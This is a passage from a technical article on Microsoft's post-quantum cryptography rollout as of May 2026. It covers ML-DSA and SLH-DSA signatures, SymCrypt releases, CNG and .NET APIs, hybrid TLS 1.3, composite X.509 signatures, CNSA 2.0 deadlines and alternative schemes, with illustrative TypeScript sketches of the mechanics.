  Hash --> Resp["Compute response z = y + c*s_1"]
  Resp --> Check{"||z||_inf < bound? ||LowBits(w - c*s_2)||_inf < bound?"}
  Check -->|no| Sample
  Check -->|yes| Out["Return signature (z, c, h)"]

ML-DSA-87's 4627-byte signature is the bottom-of-stack constraint that drives every TPM and Pluton roadmap [@fips-204-pdf]. The default TPM 2.0 command and response buffers, fixed by historical compatibility decisions, are 4096 bytes. ML-DSA-65's 3309-byte signature fits; ML-DSA-87's 4627-byte signature does not. The TCG TPM 2.0 Library Specification v1.85 (March 2026) introduces a streaming Sign/Verify family and ML-KEM Encapsulate/Decapsulate opcodes that resolve the overflow; the full opcode inventory and the new TPM2B_KEM_CIPHERTEXT / TPM2B_SHARED_SECRET / TPM_ST_MESSAGE_VERIFIED structures are catalogued in Section 9.1 [@wolfssl-wolftpm-v185]. Until v1.85 chips ship in retail volume, ML-DSA-87 cannot live on a commodity TPM. Cross-reference the TPM and Pluton sibling articles for the silicon-side mechanics.

Pluton's firmware-update agility -- the firmware ships through the existing Microsoft Update channel -- is the reason Pluton can move on PQ adoption faster than discrete TPM 2.0 chips, whose firmware updates depend on each TPM vendor's release cadence. The Pluton sibling article in this series spells out the firmware-update mechanism in detail [@ms-quantum-safe-blog].
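The buffer arithmetic can be checked directly from the parameter sets. This sketch assumes the ML-DSA parameters as I read them from the final FIPS 204 tables (matrix dimensions, $\gamma_1$, $\omega$, and the collision strength $\lambda$) and ignores TPM header and framing overhead, which only makes the fit tighter. The type and function names are illustrative.

```typescript
// Sketch: ML-DSA encoding sizes from the FIPS 204 parameters, checked against a
// 4096-byte TPM buffer. Assumption: header and framing overhead is ignored.
interface MlDsaParams {
  label: string;
  k: number;          // rows of the public matrix A
  l: number;          // columns of A
  gamma1Bits: number; // log2(gamma1)
  omega: number;      // maximum number of hint bits
  lambda: number;     // collision strength in bits
}

const ML_DSA_SETS: MlDsaParams[] = [
  { label: "ML-DSA-44", k: 4, l: 4, gamma1Bits: 17, omega: 80, lambda: 128 },
  { label: "ML-DSA-65", k: 6, l: 5, gamma1Bits: 19, omega: 55, lambda: 192 },
  { label: "ML-DSA-87", k: 8, l: 7, gamma1Bits: 19, omega: 75, lambda: 256 },
];

const TPM_BUFFER_BYTES = 4096;

// Public key: 32-byte seed rho plus k polynomials of 256 ten-bit coefficients (t1).
function mlDsaPublicKeyBytes(p: MlDsaParams): number {
  return 32 + 32 * p.k * 10;
}

// Signature: challenge hash (lambda / 4 bytes), l polynomials of z at
// (1 + log2 gamma1) bits per coefficient, and the packed hint (omega + k bytes).
function mlDsaSignatureBytes(p: MlDsaParams): number {
  return p.lambda / 4 + 32 * p.l * (1 + p.gamma1Bits) + p.omega + p.k;
}

const mlDsaFit = ML_DSA_SETS.map((p) => ({
  label: p.label,
  publicKey: mlDsaPublicKeyBytes(p),
  signature: mlDsaSignatureBytes(p),
  fitsTpmBuffer: mlDsaSignatureBytes(p) <= TPM_BUFFER_BYTES,
}));
```

Only the category-5 set overflows, and it does so by a few hundred bytes, which is why a streaming Sign/Verify interface rather than a modest buffer bump is the durable fix.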

The CNG surface mirrors ML-KEM's idiom with the signature primitives. BCryptOpenAlgorithmProvider with BCRYPT_MLDSA_ALGORITHM = L"ML-DSA" and MS_PRIMITIVE_PROVIDER returns a handle; BCryptSetProperty selects BCRYPT_MLDSA_PARAMETER_SET_44, _65, or _87; BCryptGenerateKeyPair plus BCryptFinalizeKeyPair produces the keypair; key blobs are BCRYPT_PQDSA_PUBLIC_KEY_BLOB and BCRYPT_PQDSA_PRIVATE_KEY_BLOB; signing and verification go through BCryptSignHash and BCryptVerifySignature with a BCRYPT_PQDSA_PADDING_INFO struct that selects pure-mode or pre-hash-mode (External-Mu, per FIPS 204's HashML-DSA variants) and carries an optional context string [@cng-mldsa-examples].

{// Illustrative ML-DSA signing.
// Constants gamma1, gamma2, beta are parameter-set dependent.
function mlDsaSign(message: Uint8Array, sk: SecretKey): Signature {
  const { A, s1, s2, t0 } = sk;
  let attempt = 0;
  while (attempt < 1000) {
    attempt++;
    const y = sampleMaskingVector(gamma1);           // y in R_q^l, ||y||_inf < gamma1
    const w = ringMatVecMul(A, y);                   // w = A*y in R_q^k
    const w1 = highBits(w, 2 * gamma2);
    const c = hashToChallenge(message, w1);          // c in B_tau
    const z = addVec(y, scalarMul(c, s1));           // z = y + c*s1
    if (infNorm(z) >= gamma1 - beta) continue;       // reject if response too large
    const r0 = lowBits(subVec(w, scalarMul(c, s2)), 2 * gamma2);
    if (infNorm(r0) >= gamma2 - beta) continue;      // reject if low bits leak
    return { z, c, h: makeHint(t0, c, w) };
  }
  throw new Error("ML-DSA signing exceeded attempt budget (statistically improbable)");
}}

ML-DSA sign time on x86-64 is in the low single-digit milliseconds; verify time is in the hundreds of microseconds. The rejection-sampling loop creates a measurable variance in sign time -- a side channel that a key-recovery attack can exploit if the loop count, branch pattern, or memory-access pattern leaks secret-dependent information.
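How much variance, and how improbable is exhausting a 1000-attempt budget? A rough model treats each pass through the loop as an independent trial with a fixed acceptance probability, so the attempt count is geometric. The expected-iteration figures below are the ones I recall from the FIPS 204 parameter table; treat them, and the independence assumption, as approximations rather than normative values.

```typescript
// Assumptions: each pass through the signing loop accepts independently with the
// same probability, and the expected-iteration figures are those quoted in the
// FIPS 204 parameter table.
const EXPECTED_SIGN_ITERATIONS: Record<string, number> = {
  "ML-DSA-44": 4.25,
  "ML-DSA-65": 5.1,
  "ML-DSA-87": 3.85,
};

// For a geometric distribution, the mean number of attempts is 1 / p.
const acceptProbability = (expectedIterations: number): number => 1 / expectedIterations;

// log2 of the probability that `budget` consecutive attempts are all rejected.
function log2BudgetExceeded(expectedIterations: number, budget: number): number {
  return budget * Math.log2(1 - acceptProbability(expectedIterations));
}

const worstCaseLog2 = Math.max(
  log2BudgetExceeded(EXPECTED_SIGN_ITERATIONS["ML-DSA-44"], 1000),
  log2BudgetExceeded(EXPECTED_SIGN_ITERATIONS["ML-DSA-65"], 1000),
  log2BudgetExceeded(EXPECTED_SIGN_ITERATIONS["ML-DSA-87"], 1000),
);
```

Under this model the chance of 1000 straight rejections is below $2^{-300}$ for every parameter set, so an attempt budget is a defensive assertion rather than a reachable code path. The variance that matters for side channels is in the first handful of iterations.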

5.3 SLH-DSA (FIPS 205) -- the conservative hash-based signature

SLH-DSA's security rests on hash-function security alone. No lattice. No code. No multivariate. No isogeny. Just preimage resistance and collision resistance of an underlying hash function (SHA-2 or SHAKE). If every algebraic post-quantum assumption breaks tomorrow, hash-based signatures still hold. The cost is signature size and signing time [@fips-205-pdf].

The construction is a hypertree -- a tree of XMSS subtrees, with WOTS+ (Winternitz One-Time Signature Plus) leaves at each subtree level, and FORS (Forest of Random Subsets) few-time signatures at the bottom layer signing the actual message. The hypertree itself is fixed by the key pair; what changes per signature is which bottom-layer FORS instance signs, and that index is chosen pseudorandomly from the message and a per-signature randomiser. That selection is what makes SLH-DSA (formerly SPHINCS+) stateless. Unlike LMS or XMSS, which require the signer to track a counter (because re-using a one-time key reveals the secret), SLH-DSA derives the leaf address from the message hash and the per-signature randomness; no signer state survives between signatures.

WOTS+ (Winternitz One-Time Signature Plus): A one-time signature scheme. The signer publishes a public key consisting of hash-chain endpoints; the private key is the chain starts. Signing reveals intermediate chain values that depend on the message digest. A WOTS+ key signs exactly one message; signing a second message with the same key reveals enough chain values to forge signatures on further messages. WOTS+ is the leaf primitive of XMSS and SLH-DSA [@fips-205-pdf].

FORS (Forest of Random Subsets): A few-time signature scheme built from $k$ independent hash trees, each with $t = 2^a$ leaves. To sign a message, the signer hashes the message to obtain $k$ leaf indices and reveals the leaf preimage plus authentication path in each tree. Signing many messages with the same FORS key eventually reveals enough leaves to forge, but the few-times threshold is high enough to be tolerable when FORS is the bottom layer of an SLH-DSA hypertree whose root is signed by the layer above [@fips-205-pdf].

flowchart TD
  Root["SLH-DSA public key = root of top XMSS tree (32-64 bytes)"]
  Root --> T1["Top XMSS subtree (WOTS+ leaves)"]
  T1 --> T2["Middle XMSS subtrees (WOTS+ leaves)"]
  T2 --> T3["More XMSS layers (parameter d controls depth)"]
  T3 --> Bot["Bottom XMSS subtree"]
  Bot --> FORS["FORS forest (k trees, t leaves each)"]
  FORS --> Msg["Message digest derived from per-signature randomness"]
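The hash-chain idea behind WOTS+ fits in a few dozen lines. The sketch below is plain Winternitz chaining over a 16-bit digest, with a 32-bit integer mixer standing in for the hash; it omits the bitmasks and addressing that put the "+" in WOTS+, and the mixer is invertible, so nothing here is secure. All names are hypothetical. The point is the mechanics: each digit of the digest says how far along a chain the signer walks, and the verifier walks the rest of the way to the published endpoint.

```typescript
// Toy Winternitz chain signature over a 16-bit digest. Assumptions: w = 16, a
// 32-bit mixing function instead of a real hash, and no WOTS+ bitmasks or addresses.
const WOTS_W = 16;         // each digit is one base-16 nibble
const WOTS_MSG_DIGITS = 4; // 16-bit digest -> 4 nibbles
const WOTS_SUM_DIGITS = 2; // checksum <= 4 * 15 = 60 fits in 2 nibbles

// NOT cryptographic: an invertible integer mixer standing in for SHA-2 / SHAKE.
function toyStep(x: number): number {
  let h = (x + 0x9e3779b9) >>> 0;
  h = Math.imul(h ^ (h >>> 16), 0x45d9f3b) >>> 0;
  h = Math.imul(h ^ (h >>> 16), 0x45d9f3b) >>> 0;
  return (h ^ (h >>> 16)) >>> 0;
}

function chain(start: number, steps: number): number {
  let value = start;
  for (let i = 0; i < steps; i++) value = toyStep(value);
  return value;
}

// Message nibbles followed by checksum nibbles. The checksum rises whenever a
// message digit falls, so a forger cannot simply walk every chain forward.
function wotsDigits(digest16: number): number[] {
  const digits: number[] = [];
  for (let i = 0; i < WOTS_MSG_DIGITS; i++) digits.push((digest16 >>> (4 * i)) & 0xf);
  const checksum = digits.reduce((sum, d) => sum + (WOTS_W - 1 - d), 0);
  for (let i = 0; i < WOTS_SUM_DIGITS; i++) digits.push((checksum >>> (4 * i)) & 0xf);
  return digits;
}

function wotsKeyGen(seed: number): { sk: number[]; pk: number[] } {
  const chains = WOTS_MSG_DIGITS + WOTS_SUM_DIGITS;
  const sk = Array.from({ length: chains }, (_, i) => toyStep((seed + i) >>> 0));
  return { sk, pk: sk.map((start) => chain(start, WOTS_W - 1)) }; // pk = chain endpoints
}

// Signing walks chain i forward by digit d_i.
const wotsSign = (digest16: number, sk: number[]): number[] =>
  wotsDigits(digest16).map((d, i) => chain(sk[i], d));

// Verifying walks the remaining (w - 1 - d_i) steps and compares with the endpoint.
const wotsVerify = (digest16: number, sig: number[], pk: number[]): boolean =>
  wotsDigits(digest16).every((d, i) => chain(sig[i], WOTS_W - 1 - d) === pk[i]);
```

A second signature under the same key exposes a second set of intermediate chain values. An attacker can then pick, per chain, whichever revealed value is earlier and walk forward from it, which is exactly why the key is one-time.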

Twelve parameter sets ship in FIPS 205: every combination of {SHA2, SHAKE} × {128s, 128f, 192s, 192f, 256s, 256f} where s is "small signature, slow signing" and f is "fast signing, larger signature" [@fips-205-pdf]. Public keys are 32-64 bytes; signatures range from 7,856 bytes (SLH-DSA-SHA2-128s) to 49,856 bytes (SLH-DSA-SHA2-256f). Signing time ranges from ~10 ms (SLH-DSA-SHA2-128f) to several hundred milliseconds at the high end. The use case is code signing: sign once, verify a billion times. CNG plans BCRYPT_SLHDSA_ALGORITHM with the same BCRYPT_PQDSA_KEY_BLOB and BCRYPT_PQDSA_PADDING_INFO plumbing as ML-DSA [@cng-algorithm-ids].
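The twelve sets and their signature sizes can be enumerated mechanically. The sketch assumes the per-shape parameters $(n, h, d, a, k)$ as I read them from the FIPS 205 parameter table and a Winternitz parameter of 16, which gives $2n + 3$ chains per WOTS+ signature. The names `SlhShape` and `slhSignatureBytes` are mine.

```typescript
// Sketch: enumerate the SLH-DSA parameter sets and compute signature sizes.
// Assumption: (n, h, d, a, k) per shape as tabulated in FIPS 205, with lg_w = 4.
interface SlhShape { id: string; n: number; h: number; d: number; a: number; k: number; }

const SLH_SHAPES: SlhShape[] = [
  { id: "128s", n: 16, h: 63, d: 7, a: 12, k: 14 },
  { id: "128f", n: 16, h: 66, d: 22, a: 6, k: 33 },
  { id: "192s", n: 24, h: 63, d: 7, a: 14, k: 17 },
  { id: "192f", n: 24, h: 66, d: 22, a: 8, k: 33 },
  { id: "256s", n: 32, h: 64, d: 8, a: 14, k: 22 },
  { id: "256f", n: 32, h: 68, d: 17, a: 9, k: 35 },
];

// WOTS+ chains per signature when w = 16: 2n message chains plus 3 checksum chains.
const wotsChainCount = (n: number): number => 2 * n + 3;

function slhSignatureBytes(p: SlhShape): number {
  const randomizer = 1;                               // R, one n-byte value
  const fors = p.k * (1 + p.a);                       // k secret values, each with an a-node auth path
  const hypertree = p.h + p.d * wotsChainCount(p.n);  // h auth-path nodes plus d WOTS+ signatures
  return (randomizer + fors + hypertree) * p.n;       // everything is counted in n-byte blocks
}

interface SlhSetSize { label: string; publicKeyBytes: number; signatureBytes: number; }

const slhDsaSets: SlhSetSize[] = [];
for (const family of ["SHA2", "SHAKE"]) {
  for (const shape of SLH_SHAPES) {
    slhDsaSets.push({
      label: `SLH-DSA-${family}-${shape.id}`,
      publicKeyBytes: 2 * shape.n, // PK.seed plus PK.root
      signatureBytes: slhSignatureBytes(shape),
    });
  }
}
```

The hash family changes the primitive but not the sizes, so the SHA2 and SHAKE variants of each shape share a row. The `s`/`f` trade-off is visible in `d`: fewer, taller subtrees give a smaller signature and slower signing.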

Key idea: ML-KEM is the only NIST-finalised KEM. ML-DSA is the general-purpose lattice signature. SLH-DSA is the conservative hash-based fallback. They are not interchangeable; an engineer picks one (or all three) per use case. Hybrid TLS key agreement uses ML-KEM-768; X.509 end-entity signatures use ML-DSA-65 or ML-DSA-87; long-lived code signing where signature size is tolerable uses SLH-DSA; firmware signing with build-counter discipline uses LMS or XMSS.

All three algorithms are FIPS-standardised. All three have CNG identifiers in Insider Canary builds. But until SymCrypt ships them, until Schannel negotiates them, until AD CS issues certificates that carry them, none of this exists for the Windows engineer in production. So what does Microsoft actually ship in May 2026?

6. State of the Art -- What Windows Ships in May 2026

Algorithms are not products. Microsoft ships SymCrypt, CNG, NCrypt, Schannel, .NET, AD CS, CertEnroll, and Authenticode -- and post-quantum cryptography arrives in each surface on its own clock.

SymCrypt -- the FIPS-validated foundation

SymCrypt is Microsoft's primary cryptographic library. The repository description states it directly: "SymCrypt is the core cryptographic function library currently used by Windows ... started in late 2006 with the first sources committed in Feb 2007 ... Since the 1703 release of Windows 10, SymCrypt has been the primary crypto library for all algorithms in Windows" [@symcrypt-repo]. Microsoft open-sourced SymCrypt in March 2019 [@symcrypt-repo]. It is the FIPS 140-validated module that backs CNG; if CNG ships a post-quantum algorithm on Windows, SymCrypt is the implementation underneath.

SymCrypt: Microsoft's open-source cryptographic library, used by Windows, Azure Linux, Xbox, and other Microsoft platforms. SymCrypt has been Windows's primary cryptographic library since Windows 10 1703 (April 2017); its FIPS 140-validated module is the implementation backing CNG (the Win32 API surface) and the NCrypt KSP infrastructure (the key-storage-provider surface). SymCrypt is currently written predominantly in cross-platform C, with an in-progress Rust rewrite for memory-safety reasons [@symcrypt-repo, @ms-research-symcrypt-rust].

The SymCrypt release history through May 2026 is verbatim from the public CHANGELOG [@symcrypt-changelog].

Version	Post-quantum change
103.5.0	Add ML-KEM per final FIPS 203; add XMSS / XMSS^MT
103.6.0	Add LMS implementation
103.7.0	Add ML-DSA implementation
103.8.0	Add FIPS approved-services indicator
103.9.0	Add ML-DSA Sign / Verify with External Mu
103.9.1	Add FIPS CAST for ML-DSA, plus ML-KEM and ML-DSA keygen pairwise-consistency tests
103.11.0	Add Composite ML-KEM implementation

The SymCrypt releases page lists the binary artefacts at each version for Windows AMD64/ARM64, generic Linux AMD64/ARM64, and OpenEnclave AMD64 [@symcrypt-releases]. Microsoft has also begun rewriting SymCrypt in Rust; the Microsoft Research blog post describes the rationale (memory safety in a TCB-grade library) and confirms the algorithm coverage includes "AES-GCM, SHA, ECDSA, and the more recent post-quantum algorithms ML-KEM and ML-DSA" [@ms-research-symcrypt-rust].

CNG, NCrypt, and .NET 10

The Windows Insider Canary channel introduced post-quantum CNG identifiers in May 2025 [@ms-pqc-windows-insider]. The new pseudo-handle BCRYPT_MLKEM_ALG_HANDLE, the algorithm-name strings BCRYPT_MLKEM_ALGORITHM = L"ML-KEM" and BCRYPT_MLDSA_ALGORITHM = L"ML-DSA", the prerelease BCRYPT_SLHDSA_ALGORITHM, and the existing BCRYPT_LMS_ALGORITHM are documented on the CNG Algorithm Identifiers page [@cng-algorithm-ids]. NCrypt KSPs expose the same algorithm names; an application that previously called NCryptCreatePersistedKey against an RSA KSP can do the equivalent against an ML-KEM KSP with no plumbing changes beyond the algorithm identifier and parameter set.

.NET 10 (GA November 2025) exposes the managed surface [@dotnet-10-launch]. System.Security.Cryptography.MLKem is an abstract base class with static GenerateKey and ImportEncapsulationKey factory methods and Encapsulate, Decapsulate, and ExportEncapsulationKey instance methods [@dotnet-mlkem]. MLKemCng is the CNG-backed concrete subclass that forwards to SymCrypt via CNG [@dotnet-mlkemcng]. Equivalent MLDsa / MLDsaCng and SlhDsa / SlhDsaCng pairs cover the signature primitives. The *Cng subclasses are sealed; the abstract base classes are subclassable for non-CNG implementations.

Schannel hybrid TLS 1.3

Schannel is the Windows TLS stack. The hybrid TLS 1.3 Supported Groups are defined by IETF draft-ietf-tls-ecdhe-mlkem-04 (8 February 2026) [@draft-tls-ecdhe-mlkem]:

Group	Codepoint	Construction
`X25519MLKEM768`	0x11EC	RFC 7748 X25519 plus ML-KEM-768
`SecP256r1MLKEM768`	0x11EB	NIST P-256 plus ML-KEM-768
`SecP384r1MLKEM1024`	0x11ED	NIST P-384 plus ML-KEM-1024

The IANA TLS Parameters registry lists all three (registry last updated 2026-04-29) [@iana-tls-parameters]. Schannel preview on 24H2 and Server 2025 gates these behind Group Policy in early 2026; default-on is the May 2026 -> November 2026 milestone per Microsoft's Quantum-Safe Security blog [@ms-quantum-safe-blog]. The TLS key schedule combines the two shared secrets with a concatenation combiner: the concatenated value takes the place of the (EC)DHE input when the handshake secret is extracted, $\text{HKDF-Extract}(\text{salt}, \text{IKM} = K_{\text{pq}} \,\|\, K_{\text{ecdh}})$, where the salt is the value TLS 1.3 derives from the Early Secret rather than a zero string, per draft-ietf-tls-hybrid-design-16 [@draft-tls-hybrid]. For X25519MLKEM768 the ML-KEM share and secret come first in the concatenation; the two NIST-curve groups put the ECDH component first [@draft-tls-ecdhe-mlkem]. The combiner remains secure as long as either component is unbroken; an adversary breaking only ECDH cannot recover the session key, nor can one who breaks only ML-KEM.
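The wire layout is just fixed-size concatenation, which makes it easy to sanity-check an implementation's byte counts. A minimal sketch, assuming the ML-KEM-first ordering for X25519MLKEM768 as I read draft-ietf-tls-ecdhe-mlkem (verify against the draft before relying on it); the function names are hypothetical and no real cryptography happens here.

```typescript
// Sketch of the X25519MLKEM768 wire layout. Assumption: component order (ML-KEM
// first, then X25519) follows my reading of draft-ietf-tls-ecdhe-mlkem.
const X25519_PUBLIC_BYTES = 32;
const MLKEM768_EK_BYTES = 1184;
const MLKEM768_CT_BYTES = 1088;
const SHARED_SECRET_BYTES = 32;

function concatBytes(...parts: Uint8Array[]): Uint8Array {
  const total = parts.reduce((sum, p) => sum + p.length, 0);
  const out = new Uint8Array(total);
  let offset = 0;
  for (const part of parts) {
    out.set(part, offset);
    offset += part.length;
  }
  return out;
}

function expectLength(bytes: Uint8Array, expected: number, what: string): Uint8Array {
  if (bytes.length !== expected) {
    throw new Error(`${what}: expected ${expected} bytes, got ${bytes.length}`);
  }
  return bytes;
}

// ClientHello key_share: ML-KEM-768 encapsulation key, then X25519 public key.
function clientKeyShare(mlkemEk: Uint8Array, x25519Pub: Uint8Array): Uint8Array {
  return concatBytes(
    expectLength(mlkemEk, MLKEM768_EK_BYTES, "ML-KEM-768 encapsulation key"),
    expectLength(x25519Pub, X25519_PUBLIC_BYTES, "X25519 public key"),
  );
}

// ServerHello key_share: ML-KEM-768 ciphertext, then X25519 public key.
function serverKeyShare(mlkemCt: Uint8Array, x25519Pub: Uint8Array): Uint8Array {
  return concatBytes(
    expectLength(mlkemCt, MLKEM768_CT_BYTES, "ML-KEM-768 ciphertext"),
    expectLength(x25519Pub, X25519_PUBLIC_BYTES, "X25519 public key"),
  );
}

// Input keying material that replaces the (EC)DHE secret in the TLS 1.3 key schedule.
function hybridIkm(kPq: Uint8Array, kEcdh: Uint8Array): Uint8Array {
  return concatBytes(
    expectLength(kPq, SHARED_SECRET_BYTES, "ML-KEM shared secret"),
    expectLength(kEcdh, SHARED_SECRET_BYTES, "X25519 shared secret"),
  );
}
```

The resulting 1216-byte client share and 1120-byte server share are the figures that matter for ClientHello fragmentation and middlebox testing; the 64-byte IKM is what the HKDF step consumes.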

AD CS, CertEnroll, and Azure Key Vault

The X.509 side of the migration lags TLS by a year. Active Directory Certificate Services supports ML-DSA certificate templates via the CertEnroll API, conditional on a CSP or KSP exposing BCRYPT_MLDSA_ALGORITHM. The practical migration mechanism is composite signatures per draft-ietf-lamps-pq-composite-sigs-19 (21 April 2026), which combines ML-DSA with RSA-PKCS#1-v1.5, RSA-PSS, ECDSA, Ed25519, or Ed448 in a single SubjectPublicKeyInfo and requires both components to verify [@draft-lamps-composite]. Downlevel verifiers that do not recognise the composite OID can still validate the inner classical chain; uplevel verifiers validate both. Pure post-quantum X.509 chains are in preview for closed pilots, not in general use. Azure Key Vault's managed-HSM exposes post-quantum keys in preview for Q1 2026.

flowchart TD
  ISV["ISV applications (browsers, services, SDKs)"]
  Schannel["Schannel (TLS 1.3 with X25519MLKEM768)"]
  ADCS["AD CS / CertEnroll (ML-DSA, composite signatures)"]
  DotNet[".NET 10 (MLKem, MLDsa, SlhDsa managed types)"]
  KSP["NCrypt KSPs (Microsoft Software KSP, Pluton KSP, vendor KSPs)"]
  CNG["CNG Win32 API (BCryptEncapsulate, BCryptSignHash, ...)"]
  SymCrypt["SymCrypt (FIPS-validated, primary crypto library since Win10 1703)"]
  HW["Hardware (CPU AES-NI, Pluton, TPM 2.0, IOMMU)"]
  ISV --> Schannel
  ISV --> ADCS
  ISV --> DotNet
  Schannel --> CNG
  ADCS --> CNG
  DotNet --> CNG
  Schannel --> KSP
  KSP --> CNG
  CNG --> SymCrypt
  SymCrypt --> HW

What is NOT shipping in May 2026

The honest accounting matters. Several load-bearing Windows surfaces have no post-quantum path as of May 2026.

Note: The post-quantum migration is partial. As of May 2026, none of the following has a published Microsoft post-quantum specification or shipping implementation: IKEv2 PQ key exchange; SMB hybrid (X25519MLKEM768 over SMB 3.1.1); RDP hybrid; BitLocker network unlock (still RSA-2048 + AES-256); Kerberos PKINIT (no PQ certificate path for the KDC bootstrap); Windows Hello attestation (TPM-bound RSA-2048 / ECDSA-P256). Authenticode signatures on drivers and binaries remain RSA-2048 + SHA-256 with no published PQ Authenticode specification. Premature migration of these surfaces is worse than no migration, because there is no downlevel-compatible composite story for them. The discipline is: hybrid TLS first, composite X.509 chain second, firmware signing pilot third. Leave the rest alone until Microsoft publishes specifications [@ms-quantum-safe-blog].

CNSA 2.0 -- the policy clock

CNSA 2.0 turns the technical timeline into an acquisition mandate. The four authoritative dates from the May 30, 2025 revision of the Cybersecurity Advisory [@cnsa20-csa]:

Milestone	Date
Acquisition preference for PQ in new National Security Systems	January 1, 2027
Legacy algorithm phase-out begins	December 31, 2030
Mandatory PQ adoption in National Security Systems	December 31, 2031
RSA / ECDSA disallowed in National Security Systems	After 2035

CNSA 2.0: The U.S. National Security Agency's Commercial National Security Algorithm Suite 2.0, announced September 7, 2022 [@nsa-cnsa-news]. CNSA 2.0 mandates post-quantum algorithms for U.S. National Security Systems by 2031 and disallows RSA / ECDSA after 2035. Specific algorithm selections (May 30, 2025 revision): ML-KEM-1024 for key establishment, ML-DSA-87 for general signing, LMS and XMSS for firmware signing, AES-256 for symmetric encryption, SHA-384 for hashing [@cnsa20-csa]. The CNSA 2.0 dates drive every U.S. vendor's PQC roadmap including Microsoft's.

A FIPS 140-3 validation is a Cryptographic Module Validation Program certificate that asserts a cryptographic module (a binary, with a specific version, a specific build, and a specific tested configuration) implements specific algorithms correctly and has been tested by an accredited lab. SymCrypt's FIPS validation is what makes CNG-backed cryptography acceptable for U.S. federal procurement; without validation, the same algorithm implemented in the same byte-exact code is not FIPS-validated. The cadence matters because algorithm-implementation cadence (new ML-DSA External-Mu support in v103.9.0) and module-validation cadence (a new CMVP certificate per validated build) are different clocks. SymCrypt v103.8.0 explicitly added a FIPS approved-services indicator [@symcrypt-changelog] -- the runtime hook by which an application can ask "am I operating in FIPS-validated mode?" and reject non-FIPS algorithms accordingly. CMVP queue times in 2026 are running 9-18 months, which means the published SymCrypt version is typically two or three versions ahead of the FIPS-validated version at any given moment.

ML-KEM is the only NIST-finalised KEM. ML-DSA and SLH-DSA are the only NIST-finalised signature schemes. But the NIST portfolio still has Falcon in FIPS 206 draft, HQC for code-based diversification, LMS / XMSS for firmware -- and the IETF still has composite signatures and hybrid TLS layered on top. What else is shipping, and why?

7. Competing Approaches -- Inside the Lattice Lane and Outside It

ML-KEM is the only KEM in FIPS 203, but it is not the only KEM in the portfolio. Several other algorithms compete for adjacent niches, and the engineer who treats "PQ" as one thing misses the architectural choices that CNSA 2.0 and NIST actually make.

Falcon (FN-DSA, FIPS 206 draft). NTRU-lattice signatures with fast Fourier sampling. Signature sizes range from 666 bytes (Falcon-512, category 1) to 1280 bytes (Falcon-1024, category 5) -- three to five times smaller than ML-DSA-65 at comparable security; the byte counts are verbatim from the Falcon Round-3 specification's recommended-parameters table [@falcon-spec]. The cost is Falcon's Gaussian sampler, which requires floating-point arithmetic and is notoriously hard to make constant-time. Microsoft has signalled support; SymCrypt has not shipped Falcon as of May 2026. FIPS 206 finalisation is the precondition; NIST's pqc-dig-sig project page lists Falcon (renamed FN-DSA) as the standard whose finalisation has been pushed past initial timelines pending the constant-time sampler question [@nist-pqc-dig-sig].

HQC (Hamming Quasi-Cyclic). NIST selected HQC as the fourth-round standardisation choice on 7 March 2025 [@nist-hqc-news]. HQC is code-based -- its security rests on the hardness of decoding random quasi-cyclic codes -- which is structurally unrelated to lattice cryptography. NIST IR 8545 documents the rationale: HQC offers diversification away from lattices in case future cryptanalysis makes Module-LWE less conservative than it now appears. HQC was chosen over BIKE; Classic McEliece remains a candidate but was not selected because of key size. NIST is expected to publish the HQC standard around 2027.

Classic McEliece. ~1 MB public keys at NIST category 5; ~261 KB at category 1 [@mceliece-project]. Forty-eight years of cryptanalysis without a structural break. Not selected by NIST for general standardisation. Survives as a niche choice for long-term archival key wrapping, where the key transfer happens once and the ciphertext is small.

LMS, XMSS, XMSS^MT (stateful hash-based, NIST SP 800-208). Already in SymCrypt. The NIST SP 800-208 specification names "two algorithms ... stateful hash-based signature schemes: the Leighton-Micali Signature (LMS) system and the eXtended Merkle Signature Scheme (XMSS), along with their multi-tree variants (HSS and XMSS_MT)" [@nist-sp-800-208]. CNSA 2.0 specifies LMS and XMSS for firmware signing: UEFI capsule signing, OEM driver signing, secure-boot dbx revocation entries [@cnsa20-csa]. The stateful-counter requirement -- the signer must track a build counter and never reuse a leaf index -- is acceptable in build pipelines that already track build numbers monotonically. SymCrypt v103.5.0 added XMSS and XMSS^MT; v103.6.0 added LMS [@symcrypt-changelog].

Note: CNSA 2.0 names stateful hash-based signatures for firmware signing and only firmware signing. The reason is operational. LMS and XMSS are state-leaking: signing twice with the same leaf index reveals the secret. A general-purpose signing surface (X.509 end-entity certificates, code signing for arbitrary developers, document signing) cannot guarantee state discipline. A firmware-build pipeline that issues build numbers monotonically and operates under hardware-security-module discipline can. The narrow scope is what makes LMS / XMSS safe to deploy now -- the stateless SLH-DSA story is the general-purpose alternative for everything that cannot guarantee counter discipline [@cnsa20-csa, @nist-sp-800-208].

Composite signatures. draft-ietf-lamps-pq-composite-sigs-19 (21 April 2026) defines combinations of ML-DSA with each of RSA-PKCS#1-v1.5, RSA-PSS, ECDSA, Ed25519, and Ed448 [@draft-lamps-composite]. The X.509 SubjectPublicKeyInfo contains both component public keys; verification requires both component signatures to succeed; an attacker must break both algorithms. Composite is the load-bearing migration mechanism for 2026-2030, because it is deployable against today's PKI. Downlevel verifiers ignore the composite OID and trust the inner classical chain; uplevel verifiers validate both.

Composite signature: A signature construction that combines two component signature algorithms -- one classical, one post-quantum -- such that both signatures must verify for the composite signature to validate. The composite public key is the concatenation of the two component public keys plus a composite-OID wrapper; the composite signature is the concatenation of the two component signatures. The construction provides "either-component" security: an adversary must break both algorithms to forge. Composite is the practical migration on-ramp for X.509 PKI during 2026-2030 [@draft-lamps-composite].
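The both-must-verify rule is the whole security argument, so it is worth seeing how little room there is to get it wrong. This sketch models only the AND logic: the component verifiers are passed in as hypothetical callbacks, and the draft's domain separation, pre-hashing, and ASN.1 encoding are omitted.

```typescript
// Sketch of composite verification. Assumptions: component verifiers are supplied
// by the caller; domain separators, pre-hashing, and ASN.1 handling are omitted.
type ComponentVerifier = (
  publicKey: Uint8Array,
  message: Uint8Array,
  signature: Uint8Array,
) => boolean;

interface CompositePublicKey { pq: Uint8Array; classical: Uint8Array; }
interface CompositeSignature { pq: Uint8Array; classical: Uint8Array; }

function verifyComposite(
  key: CompositePublicKey,
  message: Uint8Array,
  sig: CompositeSignature,
  verifyPq: ComponentVerifier,
  verifyClassical: ComponentVerifier,
): boolean {
  // Evaluate both components unconditionally, then combine. Accepting on
  // "either verifies" would reduce security to the weaker algorithm.
  const pqOk = verifyPq(key.pq, message, sig.pq);
  const classicalOk = verifyClassical(key.classical, message, sig.classical);
  return pqOk && classicalOk;
}
```

The failure mode to audit for in real implementations is any code path that returns success after checking only one component, for example a fallback added for interoperability with verifiers that lack the post-quantum algorithm.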

